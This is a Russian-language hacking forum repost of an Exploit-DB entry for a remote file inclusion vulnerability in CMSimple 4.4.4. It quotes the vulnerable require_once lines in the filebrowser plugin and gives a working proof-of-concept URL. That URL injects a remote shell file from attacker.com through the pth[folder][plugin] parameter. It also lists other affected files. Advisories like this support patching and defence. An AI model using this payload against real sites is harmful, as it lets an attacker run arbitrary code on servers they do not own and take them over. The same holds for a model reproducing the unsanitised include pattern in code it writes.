Exploit CMSimple 4.4.4 - Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
39272
Проверка EDB
  1. Пройдено
Автор
GOVIND SINGH
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2014-07-28
CMSimple 4.4.4 - Remote File Inclusion
Код:
source: https://www.securityfocus.com/bid/68961/info
 
CMSimple is prone to multiple security vulnerabilities including:
 
1. Multiple arbitrary PHP code-execution vulnerabilities
2. A weak authentication security-bypass vulnerability
3. Multiple security vulnerabilities
 
An attacker can exploit these issues to bypass certain security restrictions, perform unauthorized actions and execute arbitrary script code in the context of the affected application. This may aid in further attacks. 

vulnerable file "http://www.example.com/CMSimple/plugins/filebrowser/classes/required_classes.php"

Vulnerable Code :
-----------------------------------vulnerable Code----------------------------------------

        require_once $pth['folder']['plugin'] . 'classes/filebrowser_view.php';
        require_once $pth['folder']['plugin'] . 'classes/filebrowser.php';

exploit Code :
-------------------------------------PoC----------------------------------------

http://www.example.com/CMSimple/plugins/filebrowser/classes/required_classes.php?pth[folder][plugin]=http://attacker.com/shell.txt?

also embedded These files :
    CMSimple/2lang/index.php
    CMSimple/2site/index.php
    CMSimple/cmsimple/cms.php
    CMSimple/index.php
    CMSimple/plugins/index.php
 
Источник
www.exploit-db.com

Похожие темы